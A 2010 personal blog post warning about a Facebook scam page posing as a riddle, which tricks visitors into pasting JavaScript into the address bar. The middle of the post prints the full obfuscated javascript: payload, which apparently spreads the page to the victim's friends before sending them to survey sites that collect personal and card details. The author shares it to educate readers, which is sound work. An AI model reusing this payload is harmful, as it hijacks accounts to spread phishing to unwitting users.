Navigation





About Me

Narendran C R
London, UK
Follow me
Linkedin Facebook Twitter Youtube Blogspot



Wednesday, April 28, 2010

Facebook XSS attack - Only 4% of harvard grads can solve this riddle...

Recently I saw one of my friend "Liked" the Page "Only 4% of harvard grads can solve this riddle..." on Facebook. He is one of my good friends who I respect a lot and I know he is not very active in sharing information on Facebook. Obviously I was tempted to visit the page and more over I like solving puzzles and with the title "Only 4% Harvard grad"!!! no words to explain.


First page had the question and I started reading... When reached half of the question, I started thinking of various answers!!! Snow? Air? Storm? Fire?!!! Blah Blah Blah... and when I finished reading the question, the answers in my mind was contradicting each other. May be that is why only 4% of Harvard grads could solve this! I thought. Until now I had no second thoughts.

When I moved on to second page it asked me to press series of keys. I started feeling suspicious about it. It asked me to press series of keys, first press and hold "ctrl" key and then "c". Almost every one would know that it is shortcut to copy something and I know it will not work out for me as I am using Apple Mac machine. I just followed the instructions...

1. Press ctrl + c (copy something... but what the hell it is copying!!! I did not select anything)
2. Press alt + d (Haaa! this neither works in Mac. It is go to the address bar command for windows... but still I dont know what is supposed to be copied but I am now sure it is a bogus)
3. Last step ctrl + v and press enter (Ta da.... Ultimate goal reached..... I am 100% confident it is some sort of attack)

Now I am more curious to know what kind of attack it is.  Immediately I switched over to my windows machine and made sure that I was not logged in and visited the Page "Only 4% of harvard grads can solve this riddle..." as instructed I copied the content but didn't paste it in the address bar instead used textpad to analyse the content (typical software engineer ;p). I didn't want to spend much time in interpreting it as I was in middle of documenting my dissertation. Smartly thinking (:D நானே சொல்லிகிட்டா தான் உண்டு!!) I concluded that the javascript will post a message in your wall that you like the page and your friends can see and become a victim :D. If any one want the script see below.
/************** Javascript ******************************/
javascript:(
function()
{
    a='app112010525500764_jop';
    b='app112010525500764_jode';
    ifc='app112010525500764_ifc';
    ifo='app112010525500764_ifo';
    mw='app112010525500764_mwrapper';
    eval(function(p,a,c,k,e,r)
        {
            e=function(c)
            {
                return(c35?String.fromCharCode(c+29):c.toString(36))
            };
            if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);
            k=[function(e){return r[e]}];
            e=function(){return'\\w+'};
            c=1};
            while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
            return p
        }
    ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];
    d=U;
    d[e[2]](V)[e[1]][e[0]]=e[3];
    d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
    s=d[e[2]](e[6]);
    m=d[e[2]](e[7]);
    c=d[e[9]](e[8]);
    c[e[11]](e[10],I,I);
    s[e[12]](c);
    C(D(){W[e[13]]()},E);
    C(D(){X[e[16]](e[14],e[15])},E);
    C(D(){m[e[12]](c);
    d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);
    ',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B| true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))
}
)();
************************end of scrpt**********************************

Wait... still the attack is not complete. The motto of this attack is not just getting visitors to the page. It has still not revealed the answer!!! in fact there is no answer to the question. It will ask you to take a survey and redirect to different survey pages like "prizes .uk .com", "rewardstoday .co .uk" (Intentionally left spaces so that you don't become a victim :p) where you will be asked for information like your email address, name, phone number etc etc and even you credit card number :D.

Any way there is no answer for the question so you don't have to worry thinking about it...

There are already about 87,223 Victims and we don't really know how many of them gave out their personal information or credit card information!!! and each time when I hit refresh it is increasing by at least 50!!! I realized the potential of social media...

Now why did I write this blog? hoping that this might educate some people who really are innocent and might become victim.

What we can do? Visit the page "Only 4% of harvard grads can solve this riddle..." scroll to bottom and report this page so that we help taking these pages down.

Thank you very much for taking your time...

No comments:

Post a Comment